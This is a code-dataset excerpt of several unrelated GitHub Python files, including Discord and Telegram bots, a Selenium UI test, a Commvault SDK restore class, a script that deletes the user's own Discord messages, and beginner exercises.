re.findall(r\"<.>.+?\\.\", json)[0])\n\t    \t\t\t\tif len(desc) > 325:\n\t    \t\t\t\t\tdesc = desc[0:321] + \"...\" \n\t    \t\t\telse:\n\t    \t\t\t\tdesc = \"\"\n\t    \t\t\tdescription = \"**Name** : \" + name + \"\\n\" + \"**Birthdate** : \" + birthdate + \"\\n\" + \"**Profile** : \" + desc\n\t    \t\t#Add the information to the embed\n\t    \t\tembed = discord.Embed(title=titre_embed, description=description.replace(\"&#8594;\", \"→\"),colour=discord.Colour.blue())\n\t    \t\tembed.set_image(url=image)\n\t    \t\tembed.set_thumbnail(url=miniature)\n\t    \t\tembed.set_author(name=artist)\n\t    \t\tembed.add_field(name=\"Link\", value=\"[\" + url_afficher +\"]\" + \"(\" + url_afficher + \")\", inline=False)\n\t    \t\tawait message.channel.send(embed=embed)\n\t    \telse:\n\t    \t\t#If we are on the search results page\n\t    \t\ti = 0\n\t    \t\tdescription = \"\"\n\t    \t\tif len(links) > 9:\n\t    \t\t\tboucle = 9\n\t    \t\telse:\n\t    \t\t\tboucle = len(links)\n\t    \t\twhile (i < boucle) :\n\t    \t\t\tdescription = description + str(i+1) + \". \" + \"[\" + titles[i] +\"]\" + \"(\" + \"https://remywiki.com/?curid=\" + links[i] + \")\" + \"\\n\"\n\t    \t\t\ti = i + 1;\n\t    \t\tif len(links) > 9:\n\t    \t\t\tdescription = description + \"...\"\n\t    \t\t#Embed for the search results page\n\t    \t\tembed = discord.Embed(title=\"Search Results\", description=description.replace(\"&#8594;\", \"→\"),colour=discord.Colour.blue())\n\t    \t\timage = \"https://remywiki.com/wiki.png\"\n\t    \t\tembed.set_thumbnail(url=miniature)\n\t    \t\turl_afficher = \"https://remywiki.com/index.php?search=\" + argument.replace(\" \", \"%20\")\n\t    \t\tembed.add_field(name=\"Search Page\", value=\"[\" + url_afficher +\"]\" + \"(\" + url_afficher + \")\", inline=False)\n\t    \t\tawait message.channel.send(embed=embed)\n\nclient.run('TOKEN')\n","repo_name":"Sakimotor/remywiki-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28461642232","text":"\nfruits=[\"Apple\",\"Banana\",\"Grapes\",\"Lemon\"]\nif(\"Lemon\" in fruits):\n    print(\"Yes there is Lemon in fruits\")\n\n\n\n\n# Write a program that takes two lists of integers \n# and returns a new list that contains only the common \n# elements between the two lists.\ndef function(list1,list2):\n    return list((set(list1)& set(list2)))\n\nlist1 =[30,80,90,48,67]\nlist2 =[80,71,23,43,67]\nprint(function(list1,list2))\n \n\n# Write a program that takes a list of \n# integers and returns a new list that \n# contains the cumulative sum of the original list.\ndef cumulativenum(numbers):\n    answer =[]\n    sum=0\n    for num in numbers:\n        sum+=num\n        answer.append(sum)\n\n    return answer\n    \nnumbers =[40,90,80,60,50] \nprint(cumulativenum(numbers))\n\n# Write a program that takes two lists of integers \n# and returns a new list that contains the elements \n# from both lists in sorted order. 
\ndef arrangelist(listA,listB):\n    both=listA+listB\n    both.sort()\n\n    return both\n    \nlistA=[\"Ann\",\"Wakah\",\"Muyale\"] \nlistB=[\"Charles\",\"Zan\",\"Abriella\"]\nprint(arrangelist(listA,listB))\n\n# Write a Python program that squares each \n# element of a given list using list comprehension.\nnumersas =[40,57,71,89,59,70]\nmultiply= [x**2 for x in numersas]\nprint(multiply)\n\n# Write a Python program that filters out\n# all negative numbers from a given list \n# using list comprehension.\ndigits= [20,-4,78,90,-4,-78]\npositivenos=[x for x in digits if x>=0]\nprint(positivenos)\n\n# Write a Python program that concatenates two\n# lists using list comprehension .\ncompress= [80,90,50,60]\ncompress1=[30,80,60,70]\nlistcomp=[i for i in compress]+[i for i in compress1]\nprint(listcomp)\n\n\n\n\n","repo_name":"Ann-Okoyo/pip-listcomprehension","sub_path":"pip.py","file_name":"pip.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33982353440","text":"# coding=utf-8\nimport unittest\nimport time\n\nimport comall\nfrom logs.tests.members.cww_test import Login\nfrom setting.cww_test import test_el\nfrom setting.cww_test import setting\n\n\nclass OntimeTest(unittest.TestCase):\n\n    # setUp: open the browser\n    def setUp(self):\n        self.dr = comall.Comall(setting.driver_type)  # open a browser of the driver_type configured in setting\n        self.dr.open(setting.login_page)\n        self.dr.max_window()  # maximize the browser window\n        time.sleep(5)\n        Login.test_login(self.dr, self)  # call test_login from Login\n\n    def test_Otime(self):\n        ww = self.dr\n        ww.click(\"xpath\", test_el.XsubMenu)  # click the site menu\n        ww.move_to_element(\"xpath\", test_el.XsubMenu)\n        time.sleep(5)\n\n        ww.click(\"xpath\", test_el.Xontime)  # click on-time delivery\n        ww.switch_to_frame(0)\n\n        time.sleep(5)\n        ww.click(\"xpath\", test_el.XaddDeliveryOntimeServer)  # click the add on-time delivery button\n        ww.send_keys(\"xpath\", test_el.ontime_Xadd_baseinfo_name, u\"输入规则\")  # enter the rule name\n        ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_subsite_select_show)  # show the effective sub-sites\n        ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_subsite_select)  # effective sub-site - select\n        time.sleep(2)\n        ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_provide_type_show)  # show the delivery methods\n        ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_provide_type_select_first)  # select the first delivery method A\n        time.sleep(2)\n        ww.move_to_element(\"xpath\", test_el.ontime_Xadd_baseinfo_area_select_chengdu)\n        ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_area_select_chengdu)  # delivery area: select Chengdu\n        ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_area_select_chengdu_chengducity)  # delivery area - Chengdu - Chengdu city\n\n        ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_area_select_chengdu_chengducity_4)  # delivery area - Chengdu - Chengdu city - test four\n        ww.js('window.scrollTo(800,800);')\n        ww.send_keys(\"xpath\", test_el.ontime_Xadd_baseinfo_availableDay, 10)  # enter the number of bookable days: 10\n        ww.click(\"xpath\", test_el.ontime_Xadd_next_step_btn)  # next step\n        ww.js('window.scrollTo(0, -300)')\n        ww.click(\"xpath\", test_el.ontime_Xadd_timeset_Xadd_btn)  # bookable time slot settings - add button\n        ww.click(\"xpath\", test_el.ontime_Xadd_timeset_timestart_show)  # click the booking start-time button\n        ww.click(\"xpath\", test_el.ontime_Xadd_timeset_timestart_select)  # click 7.31-08:00\n        ww.click(\"xpath\", test_el.ontime_Xadd_timeset_timeend_show)  # click the booking end-time button\n        ww.click(\"xpath\", test_el.ontime_Xadd_timeset_timeend_select)  # click 7.31-23:00\n        ww.send_keys(\"xpath\", test_el.ontime_Xadd_timeset_num_input, 5)  # enter the weekday booking maximum (Mon-Fri): 5\n        ww.send_keys(\"xpath\", test_el.ontime_Xadd_timeset_num_weekend_input, 15)  # enter the weekend booking maximum (Sat-Sun): 15\n        ww.send_keys(\"xpath\", test_el.ontime_Xadd_timeset_price_input, 
30)  # enter the service fee: 30\n        ww.click(\"xpath\", test_el.ontime_Xadd_next_step1)  # click next step\n        # add holidays\n        # ww.switch_to_frame_out()\n        # ww.js('window.scrollTo(0, -300)')\n        # ww.switch_to_frame(0)\n        # time.sleep(3)\n\n        ww.click(\"xpath\", \"//*[@id='btn_addHoliday']\")  # add\n        time.sleep(3)\n\n        # tc=ww.get_element('xpath','//*[@id=\"pnl_tabContent\"]')\n        # iframe=tc.find_elements_by_tag_name('iframe')[0]\n\n        # time.sleep(3)\n\n        # ww.click('xpath','//*[@id=\"div_holidaystatus\"]/button[2]')\n        tw=ww.get_elements('xpath','//*[@id=\"frm_holiday\"]/div[1]/div[1]')[1].click()\n\n        # ww.click('xpath','//*[@id=\"frm_holiday\"]/div[1]/div[1]')\n        #ww.click('xpath','/html/body/div[5]/div[3]/table/tbody/tr[2]/td[4]')\n\n        # ww.click('xpath','//*[@id=\"frm_holiday\"]/div[1]/div[1]')\n        # ww.click('xpath','/html/body/div[5]/div[3]/table/tbody/tr[2]/td[4]')\n\n\n\n        # ww.js(\"$('#holiday_from1').attr('value','2017-08-01')\")\n        # time.sleep(3)\n        # ww.js(\"$('.datetimepicker').attr('style', 'display:none')\")\n        # time.sleep(3)\n        # ww.click(\"xpath\", \"//*[@id='holiday_end']\")\n        # time.sleep(3)\n        # ww.js(\"$('#holiday_end').attr('value','2017-08-02')\")\n        # time.sleep(3)\n        # ww.js(\"$('.datetimepicker').attr('style', 'display:none')\")\n        # time.sleep(3)\n\n        ww.click(\"xpath\", \"//*[@id='7b4fc7db-2066-4012-8cb4-645e58a3c6ab']\")\n\n        # ww.click(\"xpath\", \"/html/body/div[6]/div[3]/table/tfoot/tr/th\")\n        # ww.click(\"xpath\", \"//*[@id='div_holidaystatus']/button[1]\")\n        # ww.click(\"xpath\", \"//*[@id='txt_holiday_num0']\")\n        # ww.click(\"xpath\", \"//*[@id='txt_holiday_serverFee0']\")\n        # ww.click(\"xpath\", \"//*[@id='2d1a0450-38f4-48b7-99d7-6c014f676e38']\")\n\n        ww.click(\"xpath\", test_el.ontime_Xadd_next_step2)  # click next step\n        ww.click(\"xpath\", test_el.ontime_Xadd_timeset_btn)  # click add rule\n        ww.click(\"xpath\", test_el.ontime_Xadd_orderStartTime)  # click the order start time\n        ww.click(\"xpath\", test_el.ontime_Xadd_orderStartTime_hours)  # click hour 0\n        ww.click(\"xpath\", test_el.ontime_Xadd_orderStartTime_minutes)  # click 7.31-00:00\n        ww.click(\"xpath\", test_el.ontime_Xadd_orderEndTime)  # click the order deadline\n        ww.click(\"xpath\", test_el.ontime_Xadd_orderEndTime_nextday)  # click the next day\n        ww.click(\"xpath\", test_el.ontime_Xadd_orderEndTime_hours)  # click 11 o'clock of the next day\n        ww.click(\"xpath\", test_el.ontime_Xadd_orderEndTime_minutes)  # click 08/01-11:59\n        ww.js('window.scrollTo(0,800);')\n        ww.click(\"xpath\", test_el.ontime_Xadd_info_sublime)  # click submit\n        time.sleep(5)\n        # verify via search\n        ww.js('window.scrollTo(0,-1000)')  # leave the frame + scroll\n        ww.switch_to_frame_out()\n        ww.js('window.scrollTo(0,-1000)')\n        time.sleep(5)\n        ww.switch_to_frame(0)\n        ww.send_keys(\"xpath\", test_el.ontime_Xadd_search_input, u\"输入规则\")  # enter the rule name created above\n        time.sleep(5)\n        ww.click(\"xpath\", test_el.ontime_Xadd_search_btn)  # click search\n        time.sleep(5)\n\n    def tearDown(self):\n        # self.dr.close()\n        pass","repo_name":"huiboSong/tester","sub_path":"tests/members/cww_test/test_Ontime_03.py","file_name":"test_Ontime_03.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34875861073","text":"from ..vssubclient import VirtualServerSubclient\n\n\nclass OracleCloudVirtualServerSubclient(VirtualServerSubclient):\n    \"\"\"Derived class from VirtualServerSubclient Base class.\n    This represents a OracleCloud virtual server subclient,\n    and can perform restore operations on only that subclient.\n\n    \"\"\"\n\n    def full_vm_restore_out_of_place(\n            self,\n            vm_to_restore=None,\n            destination_client=None,\n            proxy_client=None,\n            new_name=None,\n            host=None,\n            
power_on=True,\n copy_precedence=0,\n restore_option=None,\n **kwargs):\n \"\"\"Restores the FULL Virtual machine specified in the input list\n to the provided vcenter client along with the ESX and the datastores.\n If the provided client name is none then it restores the Full Virtual\n Machine to the source client and corresponding ESX and datastore.\n\n Args:\n vm_to_restore (list) -- list of all VMs to restore\n\n destination_client (str) -- name of the pseudo client where VM should be\n restored\n\n proxy_client (str) -- the proxy to be used for restore\n\n new_name (str) -- new name to be given to the restored VM\n\n host (str) -- destination host or cluster; restores to the\n source VM ESX if this value is not\n specified\n\n power_on (bool) -- power on the restored VM\n default: True\n\n copy_precedence (int) -- copy precedence to restored from\n default: 0\n\n restore_option (dict) -- dictionary with all the advanced restore\n options.\n\n **kwargs : Arbitrary keyword arguments Properties as of\n full_vm_restore_out_of_place\n eg:\n v2_details (dict) -- details for v2 subclient\n eg: check clients.vmclient.VMClient._child_job_subclient_details\n\n Returns:\n object - instance of the Job class for this restore job\n\n Raises:\n SDKException:\n if inputs are not of correct type as per definition\n\n if failed to initialize job\n\n if response is empty\n\n if response is not success\n\n \"\"\"\n if not restore_option:\n restore_option = {}\n restore_option[\"v2_details\"] = kwargs.get(\"v2_details\", None)\n\n # set attr for all the option in restore xml from user inputs\n self._set_restore_inputs(\n restore_option,\n vm_to_restore=self._set_vm_to_restore(vm_to_restore),\n power_on=power_on,\n copy_preceedence=copy_precedence,\n volume_level_restore=1,\n client_name=proxy_client,\n vcenter_client=destination_client,\n esx_host=host,\n out_place=True,\n restore_new_name=new_name\n )\n\n request_json = self._prepare_fullvm_restore_json(restore_option)\n return self._process_restore_response(request_json)\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/subclients/virtualserver/oracle_cloud.py","file_name":"oracle_cloud.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"40348147074","text":"import requests, json, time, os, threading, base64\r\n\r\nos.system(\"cls\")\r\nchannel_id = input(\"Channel id: \")\r\nTOKEN = input(\"Your discord token: \")\r\npath = './proxy.txt'\r\nif os.path.exists(path):\r\n with open(\"proxy.txt\", \"r\") as f:\r\n proxy = f.readlines()\r\n proxy = proxy[0]\r\nelse:\r\n proxyask = input(\"Do you want to use proxy? y/n: \")\r\n if proxyask.lower() == \"y\":\r\n with open(\"proxy.txt\", \"w\") as f:\r\n f.write(\"user:pass@ip:port\")\r\n f.close()\r\n os.system(\"cls\")\r\n print(\"\\nProcess closed. Add your proxy to `proxy.txt` and start again.\")\r\n time.sleep(3)\r\n exit()\r\n else:\r\n os.system(\"cls\")\r\n print(\"\\nProcess using local ip...\")\r\n proxy = None\r\n\r\nprint(\"\\nYour discord token wont be saved/used anywhere else. 
Its only for the request to find your account.\")\r\nprint(\"\\nStarting...\")\r\ntime.sleep(3)\r\n\r\n\r\nxsuper = \"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwMS4yNDAuOTUgKEludGVybmV0KS5TY3JpcHQvMTAuMDsgV2Ugbm8t) {x-super}\"\r\n\r\nheaders = {\r\n \"Authorization\": TOKEN,\r\n \"Connection\": \"keep-alive\",\r\n \"Content-Length\": \"0\",\r\n \"Host\": \"discord.com\",\r\n \"Origin\": \"https://discord.com\",\r\n \"Referer\": \"https://discord.com/channels/@me\",\r\n \"sec-ch-ua\": '\"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Google Chrome\";v=\"116\"',\r\n \"sec-ch-ua-mobile\": \"?0\",\r\n \"sec-ch-ua-platform\": \"Windows\",\r\n \"Sec-Fetch-Dest\": \"empty\",\r\n \"Sec-Fetch-Mode\": \"cors\",\r\n \"Sec-Fetch-Site\": \"same-origin\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\r\n \"X-Debug-Options\": \"bugReporterEnabled\",\r\n \"X-Discord-Locale\": \"en-US\",\r\n \"X-Discord-Timezone\": \"Asia/Colombo\",\r\n \"X-Super-Properties\": xsuper\r\n}\r\n\r\ndef get_messages(channel_id, your_user_id, proxy):\r\n \r\n message_ids = []\r\n before_message_id = None\r\n\r\n for _ in range(10):\r\n try:\r\n params = {\r\n \"limit\": 100,\r\n \"before\": before_message_id\r\n }\r\n if proxy == None:\r\n t = requests.get(url=f\"https://discord.com/api/v9/channels/{channel_id}/messages\", headers=headers, params=params)\r\n else:\r\n proxylist = {\r\n \"http://\":proxy,\r\n \"https://\":proxy\r\n }\r\n t = requests.get(url=f\"https://discord.com/api/v9/channels/{channel_id}/messages\", headers=headers, params=params, proxies=proxylist)\r\n\r\n if t.status_code == 200:\r\n messages = t.json()\r\n\r\n if not messages:\r\n break\r\n\r\n for message in messages:\r\n if message[\"author\"][\"id\"] == your_user_id:\r\n message_ids.append(message[\"id\"])\r\n print(f\"Grabbed message: {message['id']}\")\r\n\r\n before_message_id = messages[-1][\"id\"]\r\n else:\r\n print(f\"Failed to retrieve messages. Status code: {t.status_code}\")\r\n break\r\n except Exception as e:\r\n print(f\"Error: {str(e)}\")\r\n\r\n return message_ids\r\n\r\n\r\ndef delete(message_id, channel_id, proxy=None):\r\n global rate_limit_reset\r\n\r\n if proxy is None:\r\n t = requests.delete(url=f\"https://discord.com/api/v9/channels/{channel_id}/messages/{message_id}\", headers=headers)\r\n else:\r\n proxylist = {\r\n \"http\": proxy,\r\n \"https\": proxy\r\n }\r\n t = requests.delete(url=f\"https://discord.com/api/v9/channels/{channel_id}/messages/{message_id}\", headers=headers, proxies=proxylist)\r\n\r\n if t.status_code == 204:\r\n print(f\"Deleted Message: {message_id}\")\r\n elif t.status_code == 429:\r\n retry_after = int(t.headers.get('Retry-After', 0))\r\n print(f\"!RETRY! RATE LIMIT!! 
Waiting {retry_after} seconds\")\r\n        time.sleep(retry_after)\r\n        delete(message_id, channel_id, proxy)\r\n    elif t.status_code == 403:\r\n        print(\"Cannot delete system message.\")\r\n    else:\r\n        print(f\"Error: {t.status_code}\")\r\n        print(t.text)\r\n\r\nyour_user_id = int(base64.b64decode(TOKEN.split(\".\")[0] + \"==\")) # decode the user id from the token; the extra \"==\" pads the base64 so it decodes cleanly\r\nmessage_ids = get_messages(channel_id, your_user_id, proxy)\r\nprint(\"\\nGrabbed all messages...\")\r\ntime.sleep(3)\r\nthreadarray = []\r\nfor message_id in message_ids:\r\n    time.sleep(0.3)\r\n    thread = threading.Thread(target=delete, args=(message_id, channel_id, proxy,), daemon=False)\r\n    thread.start()\r\n    threadarray.append(thread)\r\n\r\nfor thread in threadarray:\r\n    thread.join()\r\n    \r\n\r\nprint(\"Done. :)\")\r\n","repo_name":"MAROKYlmfao/Discord-Message-Deleter","sub_path":"delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"22005107017","text":"def multiply(input_list):\n    result = 1\n    for element in input_list:\n        result *= element\n    return result\n\n\ndef better_multiply(*multicands):\n    result = 1\n    for element in multicands:\n        result *= element\n    return result\n\n\ndef display(**kwargs):\n    for key, value in kwargs.items():\n        print(key, value)\n\n\ndef arg_convention(required_input , optional_input = 5 , *args , **kwargs):\n    print(required_input , optional_input , args , kwargs)\n    return 3\n\n\nmy_list = [1 , 2 , 3 , 4 , 5]\nprint(len(my_list))\nprint(display(x = \"test\", y = \"ing \", z = \"kwargs\"))\nprint(multiply([6 , 9]))\nprint(better_multiply(9 , 6))\n","repo_name":"Ion-The-Prize/2022-Math-IA","sub_path":"Algebra Tinkering.py","file_name":"Algebra Tinkering.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"16137132772","text":"import math\r\nimport random\r\n\r\ndef randomCalc(ops, digit):#This function creates the random question that is asked, its two inputs define the level it needs\r\n    num1 = random.randint(0, int(math.pow(10, digit)))\r\n    num2 = random.randint(0, int(math.pow(10, digit)))\r\n    op = random.choice(ops)\r\n    if op in '/%' and num2 == 0:#Avoid division by zero\r\n        num2 = 1\r\n    answer = eval(str(num1) + op + str(num2))\r\n    print('What is {} {} {}?\\n'.format(num1, op, num2))\r\n    return answer\r\n\r\ndef GameStart():\r\n    totaloperations = ['+','-','*','/','%']\r\n    print (\"Welcome to the random math question game!\\n\\n\\n\")\r\n    Total_Errors = 0\r\n    for level in range(5):#Iterate through each level\r\n        stars_that_level = 0#Amount of values they solved correctly\r\n        print (\"Level %d:\\nPossible length of Numbers:%d\\nPossible number of Operators:%d\"%((level+1),max(1,(level+1)//2),(level+1)))\r\n        for question in range(5):#Iterate through each question\r\n            correctvalue = randomCalc(totaloperations[:level+1],max(1,(level+1)//2))\r\n            WrongInput = True\r\n            while WrongInput:#Repeat until we get suitable input\r\n\r\n                #Print out the correct amount of stars that round\r\n                allstars =''\r\n                for numofstars in range(stars_that_level):\r\n                    allstars+='*'\r\n                if allstars != '':\r\n                    print (allstars)\r\n\r\n                attemptedvalue = input(\">>>\")\r\n                for i in attemptedvalue:\r\n                    if ((i != '0' and i != '1' and i != '2' and i != '3' and i != '4' and i != '5' and i != '6' and i != '7' and i != '8' and i != '9' and i!='-')):#BONUS: Check if the value is correct or not\r\n                        WrongInput = True\r\n                        print (\"ERROR! 
Unacceptable entry detected, try again please!\\n\")\r\n                        break\r\n                    else:\r\n                        WrongInput = False\r\n\r\n            if (int(attemptedvalue)==correctvalue):#First convert the value into an integer, and check if the answer is correct\r\n                stars_that_level+=1\r\n                print (\"Correct! You gain an additional star! You now have %d out of five stars!\"%(stars_that_level))\r\n            else:\r\n                Total_Errors += 1#Add onto the total errors\r\n                print (\"Wrong! You do not gain any stars for that question!\\nYou now have %d out of five stars!\"%(stars_that_level))\r\n        if (stars_that_level>=3):#Checks if there are enough stars\r\n            print (\"You have enough stars this level, time to move on!\")\r\n        else:\r\n            print (\"You do not have enough stars to move on to the next level, this is as far as you go!\")\r\n            return\r\n    print (\"Amazing! You beat the game! You answered a total of %d answers wrong this attempt\"%(Total_Errors))\r\n\r\nGameStart()","repo_name":"oktaydoganyildiz/Math-Game","sub_path":"Math Game.py","file_name":"Math Game.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"4783207672","text":"#! /Users/nsanthony/miniconda3/bin/python\nimport rooms.room_class as rc\nfrom people.people_directory import person_template\n\nblank = rc.room()\nblank.name = 'blank room'\nblank.descript = 'This is a blank room'\nblank.size = 'You cant see the edge'\nblank.occupied = 0\nblank.people = person_template\nblank.coord = [0,0,0]\nblank.seen = 0\nblank.vis = {}\n\nname = blank","repo_name":"nsanthony/super-fortnight","sub_path":"wwk/py/rooms/room_directory/location_template.py","file_name":"location_template.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3436698577","text":"# Exercise 7: Even Or Odd\n# Instructions\n# Write a program that asks the user for a number and determines whether that number is even or odd.\n\nnb1 = input(\"Enter a number: \")\nnb1 = int(nb1)\nif nb1 % 2 == 0:\n    print(nb1, \" is even\")\nelse:\n    print(nb1, \" is odd\")\n","repo_name":"RomaFirst/full-stack-coding-bootcam-ppython-full-time","sub_path":"Week_4/Days1/ExerciceXP/Exercice7.py","file_name":"Exercice7.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"4969167543","text":"import logging\nimport os\nimport re\nimport secrets\nimport time\nfrom datetime import datetime, timedelta\n\nimport requests\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom . 
import database, utils\nfrom .replies import HTMLReplies\n\n\nclass CardaBotCallbacks:\n def __init__(self) -> None:\n self.base_url = os.environ.get(\"CARDABOT_API_URL\")\n self.cardabotdb = database.CardabotDB(self.base_url)\n self.ebs_pool = \"pool1ndtsklata6rphamr6jw2p3ltnzayq3pezhg0djvn7n5js8rqlzh\"\n self.headers = {\n \"Authorization\": \"Token \" + os.environ.get(\"CARDABOT_API_TOKEN\")\n }\n\n def _inform_error(self, context, chat_id):\n context.bot.send_message(\n chat_id=chat_id,\n text=\"Sorry, something went wrong 😔\",\n )\n\n def _setup_callback(func):\n \"\"\"Decorator to setup callback configs and handle exceptions.\"\"\"\n\n def callback(self, update, context):\n try:\n chat_id = update.effective_chat.id\n language = self.cardabotdb.get_chat_language(chat_id)\n html = HTMLReplies()\n html.set_language(language)\n func(self, update, context, html)\n\n except Exception as e:\n self._inform_error(context, chat_id)\n logging.exception(e)\n return\n\n return callback\n\n @_setup_callback\n def help(self, update, context, html: HTMLReplies = HTMLReplies()) -> None:\n update.message.reply_html(\n html.reply(\"help.html\", supported_languages=html.supported_languages)\n )\n\n @_setup_callback\n def start(self, update, context, html: HTMLReplies = HTMLReplies()) -> None:\n update.message.reply_html(html.reply(\"welcome.html\"))\n self.help(update, context)\n\n @_setup_callback\n def change_language(\n self, update, context, html: HTMLReplies = HTMLReplies()\n ) -> None:\n \"\"\"Change default language of the chat (/language).\"\"\"\n chat_id = update.effective_chat.id\n if update.effective_chat.type == \"group\":\n if not utils.user_is_adm(update, context):\n update.message.reply_html(html.reply(\"not_authorized.html\"))\n return\n\n if not context.args:\n # set language to default (EN) when no args are passed by the user\n default_language = html.default_lang\n html.set_language(default_language)\n self.cardabotdb.set_chat_language(chat_id, default_language)\n update.message.reply_html(html.reply(\"change_lang_success.html\"))\n return\n\n user_lang = \"\".join(context.args).upper()\n if html.set_language(user_lang):\n self.cardabotdb.set_chat_language(chat_id, user_lang)\n update.message.reply_html(html.reply(\"change_lang_success.html\"))\n else:\n update.message.reply_html(\n html.reply(\"change_lang_error.html\", user_lang=user_lang)\n )\n\n @_setup_callback\n def change_default_pool(\n self, update, context, html: HTMLReplies = HTMLReplies()\n ) -> None:\n \"\"\"Change default pool of the chat (/setpool).\"\"\"\n\n if update.effective_chat.type == \"group\":\n if not utils.user_is_adm(update, context):\n update.message.reply_html(html.reply(\"not_authorized.html\"))\n return\n\n chat_id = update.effective_chat.id\n if not context.args:\n # if there are no args, change default pool to `EBS`\n self.cardabotdb.set_default_pool(chat_id, self.ebs_pool)\n update.message.reply_html(html.reply(\"change_default_pool_success.html\"))\n return\n\n user_pool = \"\".join(context.args)\n self.cardabotdb.set_default_pool(chat_id, user_pool)\n update.message.reply_html(html.reply(\"change_default_pool_success.html\"))\n\n @_setup_callback\n def epoch_info(self, update, context, html: HTMLReplies = HTMLReplies()) -> None:\n \"\"\"Get information about the current epoch (/epoch).\"\"\"\n endpoint = \"epoch/\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n r.raise_for_status() # captured by the _setup_callback 
decorator\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"progress_bar\": utils.get_progress_bar(data.get(\"percentage\")),\n \"perc\": data.get(\"percentage\"),\n \"current_epoch\": data.get(\"current_epoch\"),\n \"current_slot\": data.get(\"current_slot\"),\n \"slot_in_epoch\": data.get(\"slot_in_epoch\"),\n \"txs_in_epoch\": data.get(\"txs_in_epoch\"),\n \"fees_in_epoch\": utils.fmt_ada(data.get(\"fees_in_epoch\")),\n \"active_stake\": utils.fmt_ada(data.get(\"active_stake\")),\n \"n_active_stake_pools\": data.get(\"n_active_stake_pools\"),\n \"remaining_time\": utils.fmt_time(\n timedelta(seconds=data.get(\"remaining_time\")),\n html.reply(\"days.html\"),\n ),\n }\n\n update.message.reply_html(html.reply(\"epoch_info.html\", **template_args))\n\n @_setup_callback\n def pool_info(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Get pool basic info (/pool).\"\"\"\n # get stake_id\n if context.args:\n stake_id = str(\"\".join(context.args))\n else:\n chat_id = update.effective_chat.id\n stake_id = self.cardabotdb.get_chat_default_pool(chat_id)\n\n update.message.reply_text(\"⌛ Fetching pool info, please wait...\")\n\n endpoint = f\"pool/{stake_id}\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n\n # fmt: off\n if r.status_code == 404:\n template_args = {\"ticker\": stake_id}\n update.message.reply_html(html.reply(\"pool_info_error.html\", **template_args))\n return\n\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"ticker\": data.get(\"ticker\"),\n \"name\": data.get(\"name\"),\n \"description\": data.get(\"description\"),\n \"homepage\": data.get(\"homepage\"),\n \"pool_id\": data.get(\"pool_id\"),\n \"pledge\": utils.fmt_ada(data.get(\"pledge\")),\n \"fixed_cost\": utils.fmt_ada(data.get(\"fixed_cost\")),\n \"margin\": data.get(\"margin\"),\n \"saturation\": data.get(\"saturation\"), # !TODO: fix\n \"saturation_symbol\": utils.get_saturation_icon(data.get(\"saturation\")), # !TODO: fix\n \"controlled_stake_perc\": data.get(\"controlled_stake_percentage\"), # !TODO: fix\n \"active_stake_amount\": utils.fmt_ada(data.get(\"active_stake_amount\")), # !TODO: fix\n \"delegators_count\": data.get(\"delegators_count\"),\n \"epoch_blocks_count\": data.get(\"epoch_blocks_count\"),\n \"lifetime_blocks_count\": data.get(\"lifetime_blocks_count\"),\n }\n # fmt: on\n\n update.message.reply_html(html.reply(\"pool_info.html\", **template_args))\n\n @_setup_callback\n def pots(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Get info about cardano pots (/pots).\"\"\"\n endpoint = \"pots/\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n r.raise_for_status() # captured by the _setup_callback decorator\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"treasury\": utils.fmt_ada(data.get(\"treasury\")),\n \"reserves\": utils.fmt_ada(data.get(\"reserves\")),\n \"fees\": 